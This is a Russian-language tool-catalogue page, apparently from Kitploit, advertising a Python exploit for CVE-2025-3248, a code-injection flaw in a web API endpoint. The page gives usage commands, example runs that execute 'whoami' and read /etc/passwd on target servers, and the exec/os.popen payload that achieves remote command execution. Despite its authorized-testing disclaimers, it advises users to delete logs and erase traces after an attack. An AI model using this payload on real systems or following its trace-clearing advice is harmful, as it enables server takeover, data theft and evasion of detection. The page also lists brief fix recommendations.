Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/12-test-12/cve-2025-3248
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHub12-test-12/cve-2025-3248

CVE-2025-3248

Эксплойт на Python для CVE-2025-3248, уязвимости внедрения кода в веб-API. Выполняет произвольные системные команды через специально созданные полезные нагрузки для авторизованного тестирования на проникновение.

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-3248 Документация инструмента эксплуатации уязвимости

Введение

Данный инструмент предназначен для использования уязвимости CVE-2025-3248 (уязвимость внедрения кода на Python) путем создания вредоносной полезной нагрузки для удаленного выполнения команд (RCE) на целевой сервере. Уязвимость существует в API-интерфейсе одного веб-приложения, позволяя злоумышленнику внедрять произвольный код Python через непроверенную точку выполнения кода.

Важное замечание:

Данный инструмент предназначен только для авторизованного тестирования безопасности. Неавторизованное тестирование на проникновение может нарушить закон. Убедитесь, что у вас есть явное разрешение на использование в целевой системе.

Функциональные возможности

✅ Внедрение вредоносного кода Python через интерфейс /api/v1/validate/code
✅ Поддержка выполнения произвольных системных команд (например, whoami, ls)
✅ Настраиваемый тайм-аут (по умолчанию 10 секунд)
✅ Поддержка двух форматов вывода: текст/JSON
✅ Детальная обработка ошибок и вывод логов

Использование

Базовый синтаксис

root@kitploit:~
python cve-2025-3248.py -t <целевой URL> -c "<команда>" [опции]

Описание параметров

Примеры использования

Пример 1: Выполнение команды whoami (формат вывода по умолчанию)

root@kitploit:~
python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami"

Пример вывода:

root@kitploit:~
[+] Команда выполнена успешно
--------------------------------------------------
www-data
--------------------------------------------------

Пример 2: Вывод в формате JSON + подробный журнал

root@kitploit:~
python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v

Пример вывода:

root@kitploit:~
{
  "status": 200,
  "content": "root:x:0:0:root:/root:/bin/bash\n...",
  "success": true
}

Краткий анализ принципа уязвимости

  1. Целевой сервис принимает параметр code в интерфейсе /api/v1/validate/code
  2. Серверная сторона не выполняет безопасную фильтрацию входных данных, а непосредственно использует exec() для выполнения переданного кода Python
  3. Злоумышленник конструирует специальную полезную нагрузку:
    root@kitploit:~
    import os
    @exec("raise Exception(os.popen('whoami').read())")
    def f():
        pass
    
  4. Через механизм обработки исключений запускается os.popen() для выполнения системных команд

Риски уязвимости

Данная уязвимость может привести к полному контролю над сервером: злоумышленник может выполнять произвольные системные команды, похищать конфиденциальные данные, устанавливать бэкдоры и т.д.

Предупреждение по безопасности

⚠️ Данный инструмент предназначен только для авторизованного тестирования на проникновение ⚠️

  • Юридические риски: Использование инструмента для тестирования на проникновение без явного разрешения может нарушить Закон о компьютерном мошенничестве и злоупотреблениях и другие нормативные акты.
  • Системные риски: Выполнение системных команд может привести к сбою служб, потере данных или отказу системы.
  • Риски обнаружения: Атака может быть обнаружена и зарегистрирована файрволом, IDS/IPS.

Рекомендации:

  • Использовать только в контролируемых средах (например, лаборатории, авторизованные тестовые среды)
  • Предпочтительно использовать параметр -v для просмотра подробных логов, чтобы избежать ошибочных действий
  • После выполнения немедленно очищать следы (например, удалять логи, закрывать сессии)

Зависимости

  • Python 3.7+
  • Библиотека requests (необходимо установить заранее)
root@kitploit:~
pip install requests

Описание обработки ошибок

Технические детали

  • Местоположение уязвимости: POST-интерфейс /api/v1/validate/code
  • Тип уязвимости: Внедрение кода (Code Injection)
  • Затрагиваемые версии: Не указаны (скрипт предполагает наличие уязвимости в соответствующей версии)
  • Рекомендации по исправлению:
    • Строго фильтровать входные данные (запретить функции exec/eval и т.д.)
    • Использовать песочницу для выполнения пользовательского кода
    • Ограничить права доступа к API-интерфейсам

Отказ от ответственности

Данный документ предназначен только для целей безопасности и образования. Автор не несет ответственности за любые прямые или косвенные убытки, возникшие в результате использования данного инструмента. Обязательно соблюдайте законы и нормативные акты и используйте инструменты безопасности на законных основаниях.

Скачать инструмент
ПараметрОбязательноОписание
-t, --targetДаЦелевой URL (формат: http://ip:port)
-c, --commandДаСистемная команда для выполнения (заключается в кавычки)
-o, --outputНетФормат вывода (text/json, по умолчанию text)
--timeoutНетВремя ожидания запроса (сек, по умолчанию 10)
-v, --verboseНетОтображение подробного журнала выполнения
Код ошибкиПричинаРешение
[-] Неверный формат целевого URLВ URL отсутствует схема или хостПроверьте формат URL (например, http://127.0.0.1:8080)
[-] Тайм-аут запросаЦелевой сервер не отвечает вовремяУвеличьте значение параметра --timeout
[-] Ошибка подключенияЦель недоступна / заблокирована файрволомПроверьте сетевое соединение
[-] Ошибка выполнения команды. HTTP-статус: 403Отказ в разрешении на стороне сервераУбедитесь, что целевой сервис разрешает выполнение кода